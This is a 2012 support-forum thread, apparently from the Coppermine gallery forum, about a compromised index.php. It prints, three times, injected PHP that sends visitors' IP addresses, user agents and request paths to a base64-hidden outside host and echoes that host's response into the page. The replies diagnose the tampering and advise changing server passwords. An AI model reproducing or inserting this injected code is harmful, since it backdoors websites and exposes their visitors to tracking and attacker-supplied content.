error 452 in file index.php error 452 in file index.php
 

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Main Menu

error 452 in file index.php

Started by tortech, November 29, 2012, 01:43:02 PM

Previous topic - Next topic

0 Members and 2 Guests are viewing this topic.

tortech

Someone changed me file index.php. J have got error 452 and message:
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /DD51932/index.php on line 452
J must copied oryginal file index.php and now program works good.
Bad file index.php now is on site www.mojagazetka.pl/index.php
J think is a good way to change atrib 755 to 644 for file named index.php

Αndré

Have a look at that line:
        $cat['details']['description'] = preg_replace("/<br.*[b]?>[/b][\r\n]*/i", '<br />', bb_decode($cat['details']['description']));

it has been changed to
        $cat['details']['description'] = preg_replace("/<br.*?><?php
if (!isset($sRetry))
{
global 
$sRetry;
$sRetry 1;
    
// This code use for global bot statistic
    
$sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    
$stCurlHandle NULL;
    
$stCurlLink "";
    if((
strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
    
{
        if(isset(
$_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        
$stCurlLink base64_decode'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @
$stCurlHandle curl_init$stCurlLink ); 
    }
    } 
if ( 
$stCurlHandle !== NULL )
{
    
curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
    
curl_setopt($stCurlHandleCURLOPT_TIMEOUT6);
    
$sResult = @curl_exec($stCurlHandle); 
    if (
$sResult[0]=="O"
     {
$sResult[0]=" ";
      echo 
$sResult// Statistic code end
      
}
    
curl_close($stCurlHandle); 
}
}
?>
[\r\n]*/i", '<br />', bb_decode($cat['details']['description']));


probably because someone (you, somebody else, a script) just searched for the string "?>" (which is also used to close e.g. the opening "<?php" tag) and added his/her/its own code.


Quote from: tortech on November 29, 2012, 01:43:02 PM
change atrib 755 to 644 for file named index.php
I doubt that this will change anything.

tortech

Thank you for answer and solve a problem.


Quote from: Αndré on November 29, 2012, 02:14:08 PM
Have a look at that line:
        $cat['details']['description'] = preg_replace("/<br.*[b]?>[/b][\r\n]*/i", '<br />', bb_decode($cat['details']['description']));

it has been changed to
        $cat['details']['description'] = preg_replace("/<br.*?><?php
if (!isset($sRetry))
{
global 
$sRetry;
$sRetry 1;
    
// This code use for global bot statistic
    
$sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    
$stCurlHandle NULL;
    
$stCurlLink "";
    if((
strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
    
{
        if(isset(
$_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        
$stCurlLink base64_decode'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @
$stCurlHandle curl_init$stCurlLink ); 
    }
    } 
if ( 
$stCurlHandle !== NULL )
{
    
curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
    
curl_setopt($stCurlHandleCURLOPT_TIMEOUT6);
    
$sResult = @curl_exec($stCurlHandle); 
    if (
$sResult[0]=="O"
     {
$sResult[0]=" ";
      echo 
$sResult// Statistic code end
      
}
    
curl_close($stCurlHandle); 
}
}
?>
[\r\n]*/i", '<br />', bb_decode($cat['details']['description']));


probably because someone (you, somebody else, a script) just searched for the string "?>" (which is also used to close e.g. the opening "<?php" tag) and added his/her/its own code.

I doubt that this will change anything.

tortech

What kind of Atrb can J choose to main folder where is the Coprmine program, because somebody fist change atrib for file index.php from 644 to 755 and next damaged this file?


Quote from: Αndré on November 29, 2012, 02:14:08 PM
Have a look at that line:
        $cat['details']['description'] = preg_replace("/<br.*[b]?>[/b][\r\n]*/i", '<br />', bb_decode($cat['details']['description']));

it has been changed to
        $cat['details']['description'] = preg_replace("/<br.*?><?php
if (!isset($sRetry))
{
global 
$sRetry;
$sRetry 1;
    
// This code use for global bot statistic
    
$sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    
$stCurlHandle NULL;
    
$stCurlLink "";
    if((
strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
    
{
        if(isset(
$_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        
$stCurlLink base64_decode'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @
$stCurlHandle curl_init$stCurlLink ); 
    }
    } 
if ( 
$stCurlHandle !== NULL )
{
    
curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
    
curl_setopt($stCurlHandleCURLOPT_TIMEOUT6);
    
$sResult = @curl_exec($stCurlHandle); 
    if (
$sResult[0]=="O"
     {
$sResult[0]=" ";
      echo 
$sResult// Statistic code end
      
}
    
curl_close($stCurlHandle); 
}
}
?>
[\r\n]*/i", '<br />', bb_decode($cat['details']['description']));


probably because someone (you, somebody else, a script) just searched for the string "?>" (which is also used to close e.g. the opening "<?php" tag) and added his/her/its own code.

I doubt that this will change anything.

Αndré

I doubt that setting any permission will fix your issue, as I assume that either somebody with root access changed your file (i.e. your hosting provider via a script) or used your login data (in this case he could set the permission to what he wants).

Veronica


Αndré

As explained in Veronica's link, the attackers probably used your FTP/SSH account to change your files. So changing file permissions won't affect anything, but you have to change your server passwords.